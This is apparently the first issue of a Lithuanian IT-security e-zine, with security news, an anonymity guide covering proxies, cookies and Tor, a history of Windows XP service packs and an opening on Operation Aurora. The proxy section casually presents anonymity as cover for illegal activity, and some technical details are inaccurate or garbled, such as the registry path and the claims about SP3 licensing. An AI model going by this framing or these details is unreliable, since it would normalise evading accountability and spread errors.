Brangūs skaitytojai,

Jaučiu nenumaldomą norą išleisti, galbūt pirmąjį

Lietuvoje, lietuvišką informacinių technologijų saugumo

elektroninį žurnalą. Tačiau išleisdamas šį pirmąjį numerį jaučiu

ne tik tą nenumaldomą norą pagaliau įnešti šiek tiek ir savo

veiklos į Lietuvos IT saugumo pasaulį, tačiau ir baimę, ir laimę,

nes net neįsivaizduoju kaip jūs priimsite šį elektroninio žurnalo

numerį.

Šiame numeryje aptarsiu kaip išlikti anonimu.

Apžvelgsiu vieną iš svarbiausių šių metu atakų, kuri

paveikė keliasdešimtis pasaulinio lygio kompanijų.

Atsisveikinsime su Windows XP SP2 operacinės sistemos

versija ir pasistengsiu apžvelgti kaip blogi (juodųjų skrybelių)

vyrukai išnaudoja paieškos sistemas ir kaip jų tinklalapiai

pakliūną į aukščiausius rezultatus. Visa tai, ir dar daugiau šiame

numeryje.

Mėgaukitės,

Pagarbiai: A. Zanemunčekovas

Olympus Stylus skaitmeniniame fotoaparate aptiktas virusasJaponijos bendrovė Olympus perspėja savo pirkėjus, kad tie, kurie nusipirko

Stylus Tough 6010 skaitmeninį fotoaparatą gali būti užkrėsti virusu. Virusas yra

šios kameros atminties kortelėje.

Virusas nėra pavojingas iki tol, kol fotoaparatas nėra prijungiamas prie

kompiuterio. Kadangi tai automatinės paleisties [autorun] kirmino tipo virusas,

kuris plinta, kai automatiškai yra paleidžiamas įrenginys, taigi prijungus šį įrenginį prie kompiuterio yra

galimybė užkrėsti kompiuterį. Kitaip sakant naudotojai gali užkrėsti savo kompiuterį tuomet, kai šis

fotoaparatas yra prijungiamas prie jo. Jeigu nežinote kaip atpažinti ar jūsų skaitmeninis fotoaparatas yra

Olympus Stylus Tough 6010 tipo, jūs galite pasinaudoti toliau pateiktu patarimu.

Pagal Olympus bendrovę tik 1700 fotoaparatų yra užkrėsti virusais. Vartotojai gali atskirti savo fotoaparato

modelį pagal jo serijinį numerį. Įvedus savo fotoaparato serijinį numerį į Olympus tinkalalapį, gali peržiūrėti

ar fotoaparatas yra užkrėstas. Olympus bendrovė labai apgailestauja dėl atsitikusio įvykio ir pažadėjo, kad

tokių atsitikimų ateityje daugiau nebepasikartos.

Hakeris nulaužęs Obam`os twitter paskyra išvengė kalėjimoPrancūzų kibernetinis nusikaltėlis išvengė kalėjimo po to, kai nulaužė JAV

prezidento, Barack Obama bei kitų įžymybių twitter paskyras. 23 metų Francois

Cousteix (Dar žinomas kaip - Hacker-Croll) gavo penkis mėnesius lygtinai po to,

kai Prancuzijos teismas pripažino, kad įsilauždamas į Barack Obama, Britney Spears

bei Lily Allen twitter paskyras nepadarė jokios žalos. Francois Cousteix advokatas teigė, kad jis įsilaužė į

šių asmenų twitter paskyras motyvuodamas tuo, kad norėjo perspėti vartotojus apie duomenų nesaugumą.

Cousteix įsilaužė į šių asmenų sąskaitas po to, kai iš viešai prieinamos twitter administratoriaus pateiktų

duomenų atspėjo administratoriaus slaptažodį.

HTTPS Everywhere

Dvi organizacijos užsiimančios privatumo teisių politika išleido naują įskiepį skirtą

firefox interneto naršyklei, kuris užšifruoja interneto naršyklės ryšį.

Papildinys pavadintas HTTPS Everywhere vardu nes jis sukuria saugias HTTPS jungtis

tarp interneto naršyklės ir šių tinklalapių:

Google Search;

Wikipedia;

Twitter;

Facebook;

The New York Times;

The Washington Post;

Paypal;

EFF;

Tor;

Ixquick.

Nėra minima ar šis įskiepis galėtų apsaugoti vartotojus nuo kibernetinių nusikaltėlių atakų kurie įsiskverbia

į tinklo ryšius. Tiesa, ne visuose anksčiau minėtuose tinklapiuose ryšiai yra šifruojami, nes tuose

tinklalapiuose gali būti nesaugus trečiųjų šalių turinys.Būtina pabrėžti, kad tie tinklalapiai, kurių turinys yra

iš trečiųjų šalių interneto vardų gali nepalaikyti HTTPS. Jei interneto naršyklėje pasirodys piktograma su

perbrauktu brūkšniu tuomet reiškia, kad tinklalapis yra pažeidžiamas ir talpina nesaugų turinį.

Įskiepį galima įsidiegti iš https://www.eff.org/files/https-everywhere-latest.xpi

Saulėlydžio fanams gresia virusų atakos

Saulėlydžio filmo fanai perspėjami atsargiau naudotis Google paieškos sistema,

nes garso takelių, filmo aprašymo ieškojimas gali nuvesti į žalingus tinklalapius

kuriuose gresia užsikrėsti virusu. Jei beieškodami informacijos apie saulėlydžio

filmą atsidūrėte tinklalapyje kuriame rodomos iššokančios lentelės, perspėjančios

apie neva esančius virusus jūsų kompiuteryje, nerekomenduojama spausti jokio

klavišo, net norėdami atšaukti nespauskite cancel klavišo. Tokiu atveju į jūsų

kompiuterį gali būti įveisiami virusai. Norėdami iš tokio tinklalapio išeiti, vienu metu spustelėkite CTRL +

ALT + DELETE klavišų kombinaciją. Atsidarius užduočių vykdymo langui išjunkite naudojama interneto

naršyklę. Kibernetiniai nusikaltėliai naudoja Black Hat SEO technika kurios metu Google paieškos sistema

pripompuojama virusuotų tinklalapių iš kurių vartotojams siūloma atsisiųsti netikrą,

virusuotą antivirusinę programą.

Štai kaip viskas veikia:

Į paieškos sistemą saulėlydžio sagos fanas įveda užklausą Twilight Eclipse Release Date;

Parodomi aukštai sureitinguoti kenksmingi tinklalapiai ir vartotojas atidaro vieną iš šių tinklalapių;

Pasirodo netikras iššokantis langas, (pop-up) kuris praneša, kad vartotojo sistema yra užkrėsta

virusais;

Auka spusteli ant prevent attack mygtuko;

Į aukos kompiuterį atsiunčiama virusuota, netikra antivirusinė programa.

Saulėlydžio filmo fanai turi būti atsargus kai ieško informacijos apie saulėlydžio filmus. Privaloma būti

atidžiais net tais atvejais kai atrodo, jog paieškos rezultatai nėra kenksmingi ir visiškai patikimi. Tokios

atakos kibernetiniams nusikaltėliams atneša tonus pinigų. FTB vyrukai sučiupo vieną hakerį, kuris iš tokių

atakų sugebėjo užsidirbti net 163 milijonus dolerių.

Naujas įrankis geba atskleisti interneto slaptažodžiusRusų kompanija Elcomsoft užsiimanti programinės įrangos gamyba, į dienos šviesą išleido

naują slaptažodžių laužimo programą, kuri geba tučtuojau parodyti bei nulaužti Microsoft

Internet Explorer, pašto dėžučių, visų versijų Microsoft Outlook Express, Windows Mail ir

Windows Live Mail slaptažodžius.

Programa vadinasi Elcomsoft Internet Password Breaker ir kaip, kad skelbia jos gamintojai,

ši programa skirta saugumo pareigūnams, baudžiamųjų bylų tyrėjams ir valdžios

institucijoms, kurie galėtų naudotis ekspertizės metu. Pareigūnai galėtų iš karto pamatyti bei nulaužti

slaptažodžius, saugomus kompiuteryje. Elcomsoft Internet Password Breaker programa kainuoja viso labo

49$. Iš tokios žemos kainos galima spręsti, kad ši programa nėra skirta vien tik vyriausybinėms

organizacijoms bei saugumo pareigūnams...

Tai reiškia, kad bet kas galėtų naudotis šia programa ir nulaužti slaptažodžius, net nereikalaujant didelių

techninių žinių. Ši slaptažodžių laužimo programa vartotojams suteikia galimybę iš įvairių resursų gauti

prisijungimo vardą bei slaptažodį. Programa gali greitai sugaudyti tinklalapiuose, formose, automatiškai

įvedamoje informacijoje įvestus slaptažodžius. Elcomsoft Internet Password Breaker geba automatiškai

atpažinti visas palaikomas programas, geba surasti visus varotojus ir .PST failus ir iš jų išgauti saugomus

slaptažodžius. Jei į dienos šviesą išleidžiamos programos, kurios geba vos keliais mygtukų spustelėjimais

nulaužti slaptažodžius ir tokios net nekainuoja 100$, tuomet visoms organizacijoms bei asmeninių

kompiuterių vartotojams reiktų susirūpinti savo saugumu. Siūlyčiau pradėti šifruoti visą kietajį diską .

Kiekvieną kartą, kai komentuojate

tinklalapyje, atsisiunčiate failą iš FTP serverio,

netgi perskaitote straipsnį ar pasižiūrite varžybų

rezultatu, jūs paliekate savo pėdsakus, įrašus apie

jūsų asmeninę informaciją.

Šiuose įrašuose esanti informacija pasiekiama

tinklalapių, serverių administratorių. Iš paliktų

įrašų administratoriai gali nuspręsti jūsų IP adresą,

kompiuterio ID vardą, kokiame tinklalapyje prieš

tai lankėtės, netgi jūsų fizinę buvimo vietą, bei

interneto tiekėjų informaciją, su daugiau ar mažiau

pateikta informacija. Taip pat įmanoma peržvelgti

jūsų naudojamą ekrano rezoliuciją, operacinę

sistemą ir t.t..

Jeigu kas nors norėtų surinkti

konfidencialią informaciją apie jus, jis tūrėtų

pilnas galimybes.

Tačiau jūs neprivalote visiems pateikti

informacijos apie save.

Proxy serveriai

Proxy serveriai yra pirma jūsų gynybos

linija, taigi pradėkime nuo jos. Informacija tarp

kliento ir serverio apsikeičiama kliento – serverio

modeliu. Klientas nusiunčia užklausa (kokio failo

reikia) ir serveris atsiunčia atsakymą į užklausą (į

reikiamus failus). Kartais serveriui būtina pateikti

informaciją apie operacinės sistemos versiją,

interneto naršyklės nustatymus tam, kad serveris

žinotų, kurį tinklalapio puslapį pateikti klientui.

Yra skirtingų tinklalapio puslapių, skirtingoms

interneto naršyklėms. Tačiau paprastai interneto

tinklalapiai nepriklauso nuo interneto naršyklės

nustatymų, todėl verta slėpti šia informaciją.

Ką serveris gauna iš interneto naršyklės ?

Operacinės sistemos pavadinimą bei

versiją;

Interneto naršyklės pavadinimą bei versiją;

Interneto naršyklės nustatymus (rezoliucija,

java / javascript, flash palaikymus ir t.t. ...)

Kliento IP adresą;

Kitą informaciją.

Pati svarbiausia informacija, kurios reikia interneto

serveriui, yra informacija apie IP adresus.

Panaudojant jūsų IP adresą galima nustatyti iš

kurios šalies, kurio miesto esate, jūsų interneto

tiekėją, jūsų fizinį buvimo vietos adresą.

Kiekvienas informacijos vienetas yra tam tikros

vertės rodiklis. Jeigu informacijos vienetas yra

serveriui neperduodamas, tada atitinkamas

kintamasis bus tuščias (jo vertė nebus nustatyta).

Kliento informacija nustatoma keliais

kintamaisiais:

$_SERVER['REMOTE_ADDR']; - Kliento IP

adresas;

$_SERVER['HTTP_VIA']; - Jei šis kintamasis nėra

tuščias tuomet naudojamas proxy serveris.

Kintamasis nustato proxy serverio (ar serverių)

adresus;

HTTP_X_FORWARDED_FOR; - Jei šis kintamasis nėra

tuščias tuomet yra naudojamas proxy serveris. Šis

kintamasis saugo kliento realų IP adresą.

HTTP_ACCEPT_LANGUAGE; - Kintamasis nurodo

kuri interneto naršyklės kalba yra naudojama

(kuria kalba atvaizduoti tinklalapį).

HTTP_USER_AGENT; - Kintamasis parodo kliento

interneto naršyklės pavadinimą, versiją bei

operacinę sistemą.

HTTP_HOST; - Tinklo serverio vardas.

Tai tik maža kintamųjų dalis, kuri gali

parodyti asmeninę vartotojo informaciją. Iš tiesų jų

yra kur kas daugiau (DOCUMENT_ROOT, HTTP_ACCEPT_ENCODING,HTTP_CACHE_CONTROL, HTTP_CONNECTION,SERVER_ADDR, SERVER_SOFTWARE,SERVER_PROTOCOL, ...).

REMOTE_ADDR = 66.90.73.223

HTTP_ACCEPT_LANGUAGE = US

HTTP_USER_AGENT = Opera/9.80 (Windows NT 5.1; U; en)

Presto/2.5.24 Version/10.54

HTTP_HOST = www.webserver.ru

HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)

HTTP_X_FORWARDED_FOR = 194.115.5.5

Ši informacija gali būti naudojama įvairių

hakerių, kurie nori užkėsti jūsų kompiuterį virusu.

Taip pat surinktais jūsų pėdsakais naudojasi įvairios

reklamos kompanijos, kurios seka jūsų aktyvumą

internete. Vėliau iš tokių kompanijų sulaukiate

šlamšto laiškų.

Norint apsisaugoti nuo hakerių, įvairių

reklamos agentūrų, bei norint nuslėpti savo pėdsakus

internete geriausia naudoti proxy serverius, kurie geba

paslėpti jūsų paliekamą

informaciją, leidžiant anonimiškai naršyti

internete.

Proxy serveriai tarp mašinos ir interneto

užtikrina papildoma tarpininkavimo sluoksnį. Šių

sluoksnių yra kelių tipų, tačiau web proxies ir

Socks proxies yra svarbiausi.

HTTP proxy šie proxy serveriai perduoda

tik http protokolo duomenis, tad tinka tik WEB

tinklalapiams naršyti.

Socks proxy tai proxy perduodantys ne tik

http, bet ir kitų protokolų duomenis. Šie proxy gali

būti jungiami į proxy serverių grandinę. Socks proxy

dažniausiai nėra prieinami viešam naudojimui.

WEB proxy, šie proxy serveriai veikia per

interneto tinklalapį. Web serveryje paleidžiamas tam

tikras PHP arba ASP skriptas (scenarijus), kuris ir

atlieka proxy serverio vaidmenį. Tokie proxy turi

daug trūkumų, dažniausiai neleidžia perduoti formų

duomenų, blokuoja javascript skriptus, nesupranta

rėmelių, atidaro papildomus langus ir rodo įvairias

reklamas. Žinomiausi skriptai - PHPproxy ir

CGIproxy.

Proxy serverių naudojimas

Yra du skirtingi proxy serverių naudojimo

metodai ir kiekvienas iš jų turi savų pliusų bei

minusų.

Pirmas metodas – naudotis interneto paslaugų

proxy serveriais. Tokios sistemos pagrindinė

sudedamoji dalis yra langas. Šiame lange įvedate tos

interneto svetainės adresą, kurią norite aplankyti.

Kiekvieną kartą aplankant skirtingus tinklalapius,

reikia į tokios sistemos pagrindinį langą įvedinėti

norima aplankyti tinklalapį. Kai įvedate tinklalapio

adresą ir spustelėjate submit, surf anonymous, hide my

ass, go mygtuką prieš pat duomenų siuntimą, jūsų

visa asmeninė informacija užšifruojama. Tokiu būdu

galite anonimiškai naršyti po įvairius tinklalapius bei

atlikti kitą neteisėtą veiklą.

Tačiau nereikia pamiršti, kad atliekant juodus

darbus, jūs naudojatės interneto paslaugų proxy

serveriais dar nereiškia, kad jūsų nesuseks. Nulaužto

serverio, tinklalapio administratorius gali kreiptis į

tuos serverius kuruojančius administratorius ir gali

paprašyti pateikti jų žurnalo įrašus (logus).

Taip pat išlieka galimybė, kad galbūt šiuos

serverius kuruoja dideli, pikti dėdės su FBI

ženkliukais...

Interneto paslaugų proxy serveriai:

http://www.hidemyass.com/;

http://proxy.uzeik.net/;

http://anonymouse.org/anonwww.html;

http://www.megaproxy.com/freesurf/;

http://www.surf-anon.com/;

http://proxify.co.uk/;

http://turbohide.com/ ;

Ir t.t..

Vienas iš pagrindinių veiksnių, trukdančių

naudotis interneto paslaugų proxy serveriais, tai,

kad kiekvieną kartą norėdami anonimiškai naršyti,

jūs turite aplankyti šio tiekėjo namų puslapį.

Galima proxy serverių tinklalapį nusistatyti kaip

namų puslapį tačiau, pripažinkite, vistiek

nepatogu.

Taip pat naudojantis šių tiekėjų

paslaugomis ir anonimiškai naršant po tinklalapius

matote erzinančias reklamas, kurios automatiškai

įterpiamos į aplankomus tinklalapius. Juk turi jie

kaip nors išlaikyti savo serverius...

Kitas metodas – savo privatumą galite

apsaugoti tinkamai susikonfigūravus interneto

naršyklę, kuri leistų anonimiškai naršyti, taip

neaplankant jokių proxy serverių tiekėjų

tinklalapių. Kad susikonfigūruotumėte savo

interneto naršyklę jums reikia žinoti proxy serverį

ir kokiu prievadu (port`u) jis yra naudojamas.

Tokią informaciją galima gauti iš viešai prieinamų

proxy serverių sąrašo.

Viešai prieinamų proxy serverių sąrašas:

http://tools.rosinstrument.com/proxy/;

http://proxies.my-proxy.com/;

http://www.proxylistservice.com/Fresh

AnonymousProxyLists/Public%20Proxy%20List.h

tml;

http://www.echolink.org/proxylist.jsp;

http://spys.ru/en/;

ir t.t.

Kai žinosite proxy serverio vardą bei

prievado numerį, interneto naršyklėje pasirinkite

Tool >> Internet Options. Dabar pasirinkite

Connections followed by Settings ir pažymėkite

use a proxy server. Viskas, kas jums liko padaryti,

tai įvesti proxy serverio adresą į adresų laukelį ir

prievado numerį į port lauką.

Proxy nustatymai Opera naršyklei

Settings >> Preferences >> Advanced skirsnis >>

Network >> Proxy Servers... >> pažymėkite

HTTP ir įveskite proxy serverio adresą bei

naudojamą prievadą >> OK >> OK.

Prieš užslapstinant savo tapatybę yra keletas dalykų,

kuriuos jūs turėtumėte žinoti. Nors labai paprasta

naudotis proxy serveriais tačiau yra keletas minusų.

Proxy nustatymai Firefox naršyklei

Tools >> Options >> Advanced skirsnis >>

Network paskyra >> Settings >> pasirinkite

Manual Proxy Configuration >> įveskite proxy

serverio adresą bei prievado numerį. Jei norite šį

serverį naudoti visiems protokolams tuomet

pažymėkitee use this server for all protocol >>

OK >> OK .Viešai publikuojamais, nemokamais

proxy serveriais gali naudotis daugelis žmonių,

todėl gali suletėti viso proxy serverio darbas ir

automatiškai sulėtės jūsų naršymo greitis. Reikia

būti įgudusiam ir turėti šiek tiek patirties, jei

norima surasti patikimą, greitą proxy serverį.

Galite eksperimentuoti su viešai pateikiamais

proxy serveriais iki tol, kol rasite greitą serverį.

Daug efektyviau būtų surasti patikimus proxy

serverius. Norint surasti patikimus proxy serverius

galima pasinaudoti tokiam darbui skirtomis

programomis. Interneto erdvėje pilna tokių

programų ir dauguma iš jų platinamos nemokamai.

Šios programos tikrina viešus proxy serverius,

ištestuoja anonimiško naršymo greitį ir rezultatus

pateikia jums. Šiose programose užtenka

spragtelėti vieną mygtuką ir pasirinkti norimą

proxy serverį.

Proxy programų sąrašas:

Proxy Finder Enterprise [Freeware] ;

Anonymous Guest - Proxy Checker, SOCKS

Manager: 4.00 [Freeware] ;

Elite Proxy Switcher 1.01 [Shareware] ;

Elite Proxy Switcher [133.83 LTL / 47.54

USD] .

Nors kai kurios programos nėra nemokamos,

tačiau verta išleisti keliasdešimt litų, kad

įsigytumėte patikima proxy serverių programą

Slapukai (Cookies)

Slapukai yra maži tekstiniai failai (dažniausiai

mažiau nei 1kb dydžio) kurie sukuriami ir saugomi

standžiajame diske tuo metu, kai aplankote

dinaminį ( ar inter-aktyvų) tinklalapį. Šie slapukai

saugo jūsų asmeninę informacija. Slapukuose

esantys duomenys naudojami tais atvejais, kai

neįvedinėjant jokių slaptažodžių norima pasiekti

vartotojo

paskyra, arba nustatant kliento detales, kurios bus

pasiekiamos kitą kartą apsilankius klientui. Jei

naudojatės bendru kompiuteriu, bet kas gali

aplankyti tą patį tinklalapį ir pasiekti jūsų paskyrą.

Tai gana kebli situacija, ypač jei slapukuose

išsaugoma kreditinės kortelės informacija ir kiti

konfidencialūs duomenys. Windows XP operacinės

sistemos slapukai saugomi

c:\documents and Settings\Administrator\Cookies

Apsilankius šioje direktorijoje lengvai atpažinsite

slapukus. Tačiau, jei tikrai stengiatės rasti visus

slapukus ir niekaip nepavyksta, galite slapukus

ištrinti per interneto naršyklės nustatymus. Per čia

galite valdyti visus Opera naršyklės slapukus.

Slapūkų valdymas Opera naršyklėje

Opera >> Settings >> Preferences.. >> Advanced

skirsnis >> Cookies >> Manage Cookies

mygtukas.

Skirsnis dalyje galite pasirinkti, kad jokie slapukai

nebus saugomi (never accept cookies) arba

uždarant Opera interneto naršyklę ištrinti visus

įrašytus slapukus, (delete new cookies when exiting

Opera) ar kiekvieną kartą klaustų ar norite įrašyti

slapuką (ask me before accepting Cookies).

Slapūkų valdymas Firefox naršyklėje

Tools >> Options >> Privacy skirsnis >>

Iš išsiskleidžiamojo sąrašo (ties firefox will.. )

pasirinkite >> use costum settings for history >>

spustelėkite show cookies... mygtuką.

Jeigu norite, kad slapukai nebūtų saugomi, iš

išsiskleidžiamojo sąrašo pasirinkite never

remember history.

Ištrinti slapukus galite su tokiomis nemokamomis

programomis kaip:

CCleaner,(http://www.piriform.com/download );

Wipe,(http://privacyroot.com/software/WIPE-

download.php ).

Tor projektas

Tor - vienintelis nemokamas tokio lygio

proxy servisas, užtikrinantis aukštą anonimiškumo

lygį, paprastumą ir patogumą.

Tor projektas tai - sujungtas virtualių tunelių

tinklas, kuris leidžia vartotojams ar vartotojų

grupėms virtualioje erdvėje užtikrinti savo

privatumą ir saugumą.

Tor projektas taip pat leidžia programinės įrangos

kūrėjams kurti naujas komunikacijos priemones su

integruotomis privatumo nuostatomis.

Tor leidžia organizacijoms ir asmenims, per

viešuosius tinklus, keistis informacija

nepažeidžiant jų privatumo ribos. Tor tinklo širdis

yra vartotojų kompiuteriuose esantys proxy

serveriai.

Tai reiškia, kad jums dalyvaujant Tor tinkle, per

jūsų kompiuterį taip pat kažkas galės naršyti

internetą, bus fiksuojamas jūsų IP, nors internautas

gali būti Antarktidoje. Tor tinkle atsekti tikrąjį IP

adresą yra praktiškai neįmanoma, nes šis tinklas

yra labai dinamiškas, o jokie žurnalai nėra vedami.

Tor tinklai apsaugo jus nuo internete paplitusių

formų kurios stebi jūsų aktyvumą.

Idėja paprasta – naudojant sunkiai susekamus

maršrutus atsikratyti tais, kurie bando sekti /

stebėti jūsų aktyvumą ir periodiškai trinti jūsų

paliktus pėdsakus. Vietoj to, kad nuo šaltinio būtų

parenkamas tiesioginis kelias, per tor tinklą

duomenų paketai keliauja atsitiktiniais keliais. Jie

keliauja per kelis skirtingus ryšius, kurie slepia

jūsų paliktus pėdsakus.

Taip nei vienas stebėtojas negalės pasakyti iš kur

duomenis atėjo ir kur jie keliaus. Norėdami sukurti

privataus tinklo kelia su Tor, tarp vartojo

programinės įrangos ar kliento palaipsniui

sukuriama užšifruotų ryšių grandinė.

Kiekviena ryšiu grandinė tik žino iš kur gavo

informacija ir kam ją atiduoti. Kiekviena ryšio

grandinė yra užšifruojama tam, kad būtų

užtikrinta, jog niekas negalėtų stebėti ar sekti jūsų

siunčiamų / gaunamų duomenų.

Kai užšifruotų ryšių grandinė sukuriama,

tuomet galima keistis bet kokio tipo duomenimis.

Kadangi kiekviena užšifruota ryšių grandinė saugo

tik tuos duomenis, kurie reikalingi nustatyti iš kur

buvo gauti duomenys ir kur turi būti siunčiami,

taip niekas negali jūsų susekti.

Tor tinklai veikia tik TCP srautu ir gali būti

naudojama kartu su SOCKS. Siekiant didesnio

veiksmingumo, Tor programinė įranga naudoja tą

pačia grandinę tik 10 minučių. Praėjus 10 minučių

sukuriama nauja grandinė tam, kad vartotojas būtų

atribotas nuo ankstesnių jo veiksmų.

Tor tinklai geba nuo įvairių tarnybų paslėpti savo

buvimo vietą. Tor vartotojai gali, neatskleidžiant

savo tinklo ypatybės, prisijungti prie įvairių

tarnybų.

Verta įsidėmėti, kad Tor tinklai negali išspręsti

visų anonimiškumo problemų.

Tor tinklai geba apsaugoti tik tinkle keliaujančius

duomenis.

Atsisiųsti Tor programinę įranga galite iš

http://www.torproject.org/easy-download.html.en

Tikriausiai jau žinote, o jei nežinote skubu

jums pranešti, kad nuo 2010m. liepos 13 d.

Microsoft bendrovė nebepalaiko Windows XP SP2

operacinės sistemos [toliau – OS] versijos. Regis

Microsoft`as ėmėsi ryžtingų veiksmų.

Paanalizuokime šia situacija pesimistišku

požiūriu. Kadangi Microsoft daugiau nebeteiks

saugumo atnaujinimų Windows XP SP2 ir

Windows 2000 OS tai reiškia, kad netiesiogiai

vartotojus verčia atsisiųsti arba SP3 atnaujinimą

(kuris yra nemokamas TIK verslo sektoriuje) arba

pirkti / diegti naujesnę windozę iš ko Microsoft

tikrai pasidarys pelno, vien tik dėl to, kad verslo

sektoriuje ir namų vartotojų rinkoje daugiau nei

pusę vartotojų, kurie naudojasi Windows OS,

naudoja būtent Windows XP SP2.

Optimistiškas požiūris. Microsoft suskubo

rūpintis mūsų, paprastų vartotojų bei įmonių

saugumu todėl ir nutraukė Windows XP SP2

palaikymą.

Tikriausiai įdomu kodėl būtent Windows

XP SP2 operacinės sistemos versija, kodėl ne XP

SP1, XP SP2 ar XP SP3. Panagrinėkime išsamiau.

Windows XP SP analizė

Microsoft pradėjo leisti servisų paketus,

siekdamas pataisyti ir pridėti naujų ypatybių

Windows šeimos operacinėms sistemoms.

Kiekvienas servisų paketas tai visų, ankstesnių

paketų superpaketas , todėl pakanka įdiegi išleistą

vėliausią paketą ir visi ankstesni paketai bus įdiegti

kartu. Tačiau, jei dar turite Win XP be jokių įdiegtų

servisų paketų, jums reiktų pirmiausia įdiegti SP1

paketą ar SP2 paketą, kad galėtumėte įdiegti SP3.

Service Pack 1

Pirmasis servisų paketas (SP1), skirtas

Windows XP OS buvo išleistas 2002m. rugsėjo 9d.

Šis servisų paketas turi vienus iš svarbiausių

saugumo spragų pataisymų, atnaujinimų,

suderinamumų, NET Framework bibliotekų

palaikymą. Šios bibliotekos Win XP OS leidžia

atpažinti planšetinius kompiuterius (Tablet Pc) bei

naują Windows Messenger 4.7 versiją. Pati

svarbiausia ypatybė atkeliavusi su šiuo servisų

paketu buvo USB 2.0 jungties palaikimas bei Set

Program Access and Default programų grupės

priėjimas. Per šį komponentą vartotojai gali

kontroliuoti interneto naršyklės ir instant message

aktyvumą. Kartu su šiuo paketu palaikoma SATA

jungtį turintys standieji diskai, kurie buvo didesni

nei 137Gb (48 bitų LBA palaikymas). Taip pat

šiame pakete yra ir Java virtualios mašinos, bei

IPv6 palaikymas.

2003 m. vasario 3 d. Microsoft išleido

pirmojo servisų paketo a versija. Po įvykusio

teismo su Sun Microsystems šiuo paketų buvo

panaikintas Microsoft Java virtualios mašinos

palaikymas.

Service Pack 2

Antras servisų paketas skirtas WIN XP OS

(SP2) (kodinis vardas Springboard [Tramplynas])

buvo išleistas 2004m. rugpjūčio 25 d. Šis servisų

paketas pridėjo daug naujų ypatybių.. Su šiuo

servisų paketu tapo palaikomas Wi-Fi bei WPA

šifravimas. Internet explorer 6 naršyklėje įdiegta

iššokančių langų (pop-up) blokavimo sistema bei

Bluetooth ryšio palaikymas. Naujame

pasisveikinimo lange, kuris pasirodo kiekvieną

kartą, kai windozė kraunasi buvo ištrintas užrašas

"Professional", "Home Edition" ir "Embedded".

Žalias krovimosi laukelis Home Edition versijoje ir

geltonas laukelis buvo pakeisti mėlynais.

Antrasis servisų paketas pridėjo naujas apsaugos

priemones. Pagal nutylėjimą pradėta naudoti

Windows ugniasienė. Taip pat pridėta duomenų

apdorojimo apsauga, kurią anksčiau buvo galima

lengvai išnaudoti. OS palaikė NX bitų sistemą,

kuri sustabdo įvairias buferio perpildymo atakas.

Antrajame servisų pakete atsirado Windows

Security Center palaikymas kuris parodo visos

sistemos apsaugos būseną, įskaitant ir įdiegtos

antivirusinės programos, Windows atnaujinimus

bei naujosios Windows ugniasienės. Security

Center komponente gali būti pridėtos trečiūjų šalių

antivirusinės programos bei ugniasienės.

Service Pack 2b

2006 m. Rugpjūčio mėnesį Microsoft

išleido antrojo servisų paketo b papildymą, kuris

atnaujino media įdiegimą (Duomenys imti iš

įvairių šaltinių, gali būti netikslumų Aut. Pstb.).

Service Pack 2c

2007m. rugpjūčio 10 d. Microsoft paskelbė, kad

išleido vieną iš pagrindinių atnaujinimų, skirtų

antrajam servisų paketui. Atnaujinimas pavadintas

Service Pack 2c (SP2c). Šis atnaujinimas sumažina

Windows XP operacinės sistemos raktų naudojimą.

Atnaujinimas prieinamas tik sistemų kūrėjams.

Service Pack 3

Windows XP trečiasis servisų paketas buvo

išleistas 2008m. balandžio 21d..

Naujos 3 servisų paketo ypatybės:

Juodųjų maršrutizatorių aptikimas;

Kliento tinklo priėjimo apsauga;

IEEE 802.1X autentifikacijos palaikymas

grupėms;

Aprašomi saugumo nustatymai apsaugos

grupėms bei vietinei apsaugai;

Atnaujintas Microsoft kriptografinio

šifravimo modulis;

Produkto kodo reikalavimas;

Anksčiau išleisti atnaujinimai;

Atnaujinti IPSec filtrai;

MSXML 6.0 SP2 ir XMLLite;

Įdiegiama atnaujinta microsoft valdymo

kontrolės versija;

Palaikomas nuotolinio darbalaukio

protokolas;

Atnaujinta tinklo diagnozės įranga;

Atnaujinta WPA2

Įdiegta Windows Script 5.7;

Įdiegta Windows Installer 3.1 v2;

Windows XP SP3 gali būti įdiegtas ir

naudojamas 30 dienų, be jokio produkto kodo

reikalavimo. Po 30 dienų naudotojas perspėjamas

įvesti teisingą servisų paketo kodą ir aktyvuoti

įdiegimą.

XP SP3 turi visus ankstesnius servisų paketus

skirtus XP OS. Šis servisų paketas patikrinaHKLM_LOCAL_MACHINE\\SYSTEM\CurrentControlSet\Control\Windows\direktorijoje esantį CSDVersion registro raktą. Jei

registro raktas yra lygus ar didesnis nei 0x100,

tuomet pradedamas atnaujinimo procesas, kitu

atveju naudotoją perspėja įdiegti SP1 ar SP2.

Kadangi naudotojui paprastai nebegalima atsiųsti

SP1 paketo kaip atskiro komponento, jam reikia

atsisiųsti šį paketą per automatinį Windows

atnaujinimo langą. Taip pat šis servisų paketas turi

papildomų atnaujinimų skirtų OS Windows XP

Media Center Edition (MC) ir Windows XP Tablet

PC Edition komponentams. Su šiuo atnaujinimu iš

ScreenSaver skirtuko panaikinta „energijos

žvaigždutės“ logotipas (Energy Star).

Blaster, Nimda, Code Red ir kiti aukšto lygio

kirminai neabejotinai tapo praeities dalimi, jie

pakeitė elektroninių grėsmių erdvę.

Operacija „Aurora“ dar kartą pakeitė visą

elektroninų grėsmių erdvę. Ši ataka parodė, kad

didžiausios kompanijos yra labai pelningi taikiniai.

Nors „Aurora“ ataka buvo pradėta vykdyti

dar 2009 metų viduryje ir tesėsi iki 2010 m.

Pradžios, tačiau šios atakos užmiršti neįmanoma,

nes šios atakos metu buvo įsilaužtą į daugiau nei

36 kompanijų, tarp jų ir į tokias kaip – Google ,

Adobe Systems, Jupiter Networks, Rackspace,

Yahoo, Symantec, Northon Grumman ir kt.

Operacija „Aurora“ parodė, kad siekiant

kompanijų intelektualinės nuosavybės,

kibernetiniai nusikaltėliai gali būti labai

koordinuoti. Kol didžiųjų kompanijų darbuotojai

ramiai ilsėjosi užsitarnautomis gruodžio mėnesio

atostogomis, kibernetiniai nusikaltėliai siautėjo.

Bet viskas nuo pradžių.

Dmitri Alperovitc, McAfee grėsmių

viceprezidentas pavadino šia ataka Auroros vardu,

nes buvo atrasta, kad „Aurora“ pavadinimas tai

atakuojančios mašinos bylos kelias, kurioje buvo

du kenkėjų failai.

Pagal McAfee, pagrindinis šios

atakos tikslas buvo gauti prieigą prie šių

atakuojančių bendrovių bei pavogti

konfidencialius šių bendrovių duomenis. 2010 m.

Sausio 12 dieną Google , savo tinklaraštyje

paskelbė, kad tapo kibernetinių nusikaltėlių auka.

